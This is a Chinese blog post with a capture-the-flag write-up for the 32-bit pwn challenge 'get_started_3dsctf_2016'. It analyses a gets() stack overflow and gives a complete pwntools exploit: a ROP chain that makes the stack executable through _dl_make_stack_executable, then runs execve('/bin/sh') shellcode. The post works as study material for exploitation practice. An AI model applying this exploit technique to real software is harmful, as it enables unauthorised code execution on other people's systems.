【CTF】get_started_3dsctf_2016

最新推荐文章于 2024-07-07 17:28:09 发布
最新推荐文章于 2024-07-07 17:28:09 发布
阅读量626 收藏 1
点赞数 1
分类专栏: CTF 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u011317663/article/details/122573085
版权

解题思路:
1 先反编译,第一印象代码比较多、杂,找main函数找了半天才找到。

undefined4 main(void)
{
  char local_38 [56];
  
  printf("Qual a palavrinha magica? ");
  gets(local_38);
  return 0;
}

2 看main函数,第一感觉是典型的栈溢出。然后就是ELF的一些保护。

Arch:     i386-32-little
RELRO:    Partial RELRO
Stack:    No canary found
NX:       NX enabled
PIE:      No PIE (0x8048000)

同样,第一感觉,NX enabled,栈不可执行,shellcode方法被PASS掉,那就需要找系统函数ROP。

3 翻了代码,第一,没有找到程序中可以利用的函数;第二,程序没有加载libc(看了下反编译的代码,printf和gets都是重写的),利用libc的方式也不行。

4 走到死胡同了,看来得回头考虑shellcode的方式。因为之前没有接触过类似的题目,所以有点漫无目的,在代码中搜system、execve、exec等关键字,嗨,真被搜出来一个线索:

_dl_make_stack_executable
execute_stack_op

看字面意思都是栈可执行相关的函数,不熟悉,一搜索就搜索出类似题目的writeup,没办法,看一眼吧。链接在文末。主要思想:

int __regparm3 _dl_make_stack_executable(uint *param_1)

{
  int iVar1;
  int in_GS_OFFSET;
  
  if (*param_1 == __libc_stack_end) {
    iVar1 = mprotect((void *)(-_dl_pagesize & *param_1),_dl_pagesize,__stack_prot);
    if (iVar1 == 0) {
      *param_1 = 0;
      _dl_stack_flags = _dl_stack_flags | 1;
    }
    else {
      iVar1 = *(int *)(&DAT_ffffffe8 + in_GS_OFFSET);
    }
    return iVar1;
  }
  return 1;
}

1)进入__libc_stack_end那个判断分支
2)__stack_prot需要赋值为7,打开栈可执行权限。

5 剩下就是常规操作, 找溢出点,工具生成shellcode,找gadget。

from pwn import *
from pwnlib.shellcraft import i386
import time
elf = ELF('./get_started_3dsctf_2016')
sh = process('get_started_3dsctf_2016')
shellcode = b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80"
nops = b"\x90" * (56)
rop = nops
rop  += p32(0x0806fc30) # pop edx ; ret
rop  += p32(0x080eafec) # __stack_prot
rop  += p32(0x01020304) # 下面两个值无意义,没有找到合适的gadget
rop  += p32(0x05060708)
rop  += p32(0x080b91e6) # pop eax ; ret
rop  += p32(0x07)       # 7 (PROT_EXEC|PROT_READ|PROT_WRITE|PROT_NONE)
rop  += p32(0x080557ab) # mov dword ptr [edx], eax ; ret

rop  += p32(0x080b91e6) # pop eax ; ret
rop += p32(0x080eafc8) # __libc_stack_end (param1通过eax传入)
rop += p32(0x0809aef0)  # _dl_make_stack_executable
rop += p32(0x08093d41) # push esp; ret (需要,把shellcode放入esp执行?)
rop += shellcode
print(rop)
with open("payload.txt", "wb") as f:
     f.write(rop)
sh.sendline(rop)
sh.interactive()

总结:
1)找gadget费了些时间,原因是工具不熟,不能很快速的找到自己想要的gadget。(之前的题目好像很容易找~~~,没有动用工具专门去找过)
2)中间找到某个gadget,但是因为地址有0x0a,也就是\n换行符的ASCII码,导致输入被截断,排查了好一会,最后只能换另外一个gadget。
3) gdb还是不够熟,调试费了不少时间。

附录:

  1. The Tale of the Really SAD binary
  2. [ROP] Ret to Stack
delta_hell
关注
专栏目录
get_started_3dsctf_2016|get_started_3dsctf_2016
12-11
网络安全逆向PWN题目,简单的栈溢出,虽然有后门函数,但同时又给了一定的限制条件,可以使用更复杂的ROP解法。该样本题解:https://blog.csdn.net/A951860555/article/details/111030289
get_started_3dsctf_2016
qq_45691294的博客
12-17 1395
先进入到题目环境里,程序接收用户输入,然后返回一串字符 checksec查看一下保护,只开启了NX,堆栈不可执行保护 用IDA分析程序,这一段程序很简短,gets函数存在溢出 发现了一个名为get_flag的函数 通过这个函数传入参数,且满足条件(a1 == 814536271 && a2 == 425138641)即可读取到flag 思路就是main函数溢出到返回地址的时候直接溢出到if条件判断里面,即使栈空间被破坏了,但是无所谓,已经输出flag了 这里可以用本地调试判断偏移量
BUUCTF get_started_3dsctf_2016
最新发布
zwb2603096342的博客
07-07 1080
mprotect的运用
get_started_3dsctf_2016【BUUCTF】(两种解法)
qq_41696518的博客
08-27 1309
get_started_3dsctf_2016
【Pwn】get_started_3dsctf_2016
ethan18的博客
07-20 222
这是一个有点难度的题目,反正我是后面去看师傅们的wp了。。。这个题目听大家讲本地的和远程的exp居然还是有差别的首先拿到文件,开始老三样查看主要看在哪个平台:32位还是64位,还有就是有没有canary,如果有的话一般来说都不会是栈溢出攻击的题目然后拖进ida这个可以看出真的是一个栈溢出攻击我们还可以看到get_flag函数看出来是直接进行溢出到第8行地址就行。但是注意,可能是由于这题目远程的时候一些奇妙问题,在我们使用远程的时候没有正常退出会导致出错,无法获取回显。
ctf【get_started_3dsctf_2016
HUANGliang_的博客
10-29 187
ret2libc a1 == 0x308CD64F && a2 == 0x195719D1 get_flag函数地址0x80489A0 main函数地址0x8048A20
ctf-tools-linux-master_ctf工具_ctf工具_CTFtools_CTF_Tools_
10-01
CTF常用小工具你值得拥有那个。。。。111
轩禹CTF_RSA工具3.6.1.zip
01-29
CTF常用工具集
0ctf_2016_warmup
05-17
2016年0ctf的pwn题。
CTF神器_ctf
09-23
【标题】:“CTF神器_ctf” 在网络安全领域,CTF(Capture The Flag)是一种流行的竞赛形式,参与者通过解决各种安全挑战来展示他们的技能。在这个压缩包“CTF神器_ctf”中,重点可能指向了一个名为“dirsearch”的...
buuctf get_started_3dsctf_2016 wp(python3)
Kata_Jhin的博客
03-14 159
buuctf get_started_3dsctf_2016 wp(python3)
buuctf get_started_3dsctf_2016
carol2358的博客
04-09 460
先checksec 这道题打远程需要改变内存权限,需要用到mprotec,这道题里也是有这个函数的 这道题有点特殊,是没有bp的,程序的函数调用约定是cdecl,依靠sp来进行平衡栈,需要取值就看与sp的偏移。 padding为0x38 大致的思路就是先找到mprotect,bss,read(向bss写入shell),pop(用来pop出mprotect的参数,进行第二次函数调用)的地址,然后传...
[BUUCTF]PWN11——get_started_3dsctf_2016
mcmuyanga的博客
08-28 3852
[BUUCTF]PWN11——get_started_3dsctf_2016 题目网址:https://buuoj.cn/challenges#get_started_3dsctf_2016 步骤: 第一个方法,本地打通,要自己创建一个flag.txt 例行检查,32位,开启了nx保护 nc一下,看看程序大概的执行情况 32位ida载入,shift+f12查看程序里的字符串,看到了flag.txt 双击跟进,ctrl+x查看哪个函数调用了它,发现了一个函数,当a1=0x308cd64f,a2=0x19
ctf Web_php_include
08-28
CTF(Capture The Flag)是一种网络安全竞赛,其中参与者需要解决各种与网络安全相关的问题。"Web_php_include" 是一个问题的提示,暗示了一个与 PHP 文件包含漏洞相关的 CTF 题目。 PHP 文件包含漏洞是一种常见的 Web 安全漏洞,它允许攻击者通过构造恶意请求来包含并执行服务器上的任意文件。攻击者可以利用这个漏洞来读取敏感文件、执行任意代码以及获取服务器权限。 在 CTF 中,解决 "Web_php_include" 题目的步骤通常如下: 1. 探测漏洞点:通过发送不同的请求,观察是否存在 PHP 文件包含漏洞。 2. 利用漏洞点:构造特定的请求,使得服务器执行恶意代码或读取敏感文件。 3. 获取目标:根据题目要求,尝试获取相应的 flag 或其他标识符。 4. 提交答案:将 flag 或其他标识符提交给比赛组织者验证。 请注意,在实际应用开发中,要避免 PHP 文件包含漏洞,可以使用安全的文件包含函数(如 require_once 或 include_once)、限制包含路径、以及对用户输入进行严格过滤和验证等安全措施。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值